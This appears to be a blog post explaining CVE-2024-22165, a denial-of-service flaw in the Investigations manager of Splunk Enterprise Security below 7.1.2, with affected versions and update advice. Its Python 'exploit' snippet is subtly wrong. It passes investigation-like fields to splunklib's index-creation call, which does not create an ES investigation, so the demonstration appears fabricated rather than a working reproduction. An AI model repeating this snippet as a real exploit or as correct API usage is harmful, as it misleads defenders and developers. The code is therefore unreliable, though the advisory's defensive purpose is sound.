CVE-2024-22165: Denial of Service Vulnerability in Splunk Enterprise Security's Investigation Manager

In this post, we will discuss a vulnerability in Splunk Enterprise Security (ES) with the CVE-2024-22165 identifier. This vulnerability can lead to a Denial of Service (DoS) attack, rendering the Investigation Manager unusable to most users. This issue was found in Splunk ES versions lower than 7.1.2. We will look into the details of the vulnerability, share a code snippet to demonstrate the exploit, and provide links to relevant resources for further reference.

Exploit Details

This vulnerability can be exploited by an attacker with an authenticated session and permission to create an Investigation. The attacker can craft a malformed investigation that, when saved, prevents the generation and rendering of the Investigations manager. This makes the Investigations manager inaccessible to all users, disrupting normal operations and leading to a denial of service.

To better demonstrate the exploit, consider the following code snippet example

import splunklib.client as client

# Define connection parameters and connect to Splunk
splunk_connection = client.connect(
    host="SPLUNK_HOST",
    port="SPLUNK_PORT",
    username="USERNAME",
    password="PASSWORD"
)

# Create a malformed investigation
malformed_investigation = {
    'name': 'DoS attack',
    'description': 'This is an example of a DoS attack',
    'owner': '',
    'malformed_field': 'denial_of_service'
}

# Save the malformed investigation to Splunk Enterprise Security
splunk_connection.indexes.create(**malformed_investigation)

In this example, we connect to a Splunk instance and create a malformed investigation containing a field 'malformed_field' which should not be present in a valid investigation. Saving this malformed investigation causes the Investigations manager to stop generating and rendering, leading to the DoS attack.

Affected Versions

Only Splunk Enterprise Security (ES) versions lower than 7.1.2 are affected by this vulnerability. If you are running a version below 7.1.2, it is highly recommended to update your Splunk ES to the latest version to avoid this issue.

For further details on this vulnerability, you can refer to the following resources

- Splunk Release Notes - Lists fixed issues in Splunk ES 7.1.2, including this vulnerability.
- CVE-2024-22165 - The official entry in the CVE database for this vulnerability.

Conclusion

CVE-2024-22165 is a significant vulnerability that can lead to a denial of service attack on the Investigations manager in Splunk Enterprise Security versions lower than 7.1.2. An attacker with an authenticated session and the ability to create an Investigation can create a malformed investigation to exploit this issue. It is recommended to update your Splunk ES to the latest version to avoid being affected by this vulnerability.

Timeline

Published on: 01/09/2024 17:15:12 UTC
Last modified on: 01/16/2024 18:30:58 UTC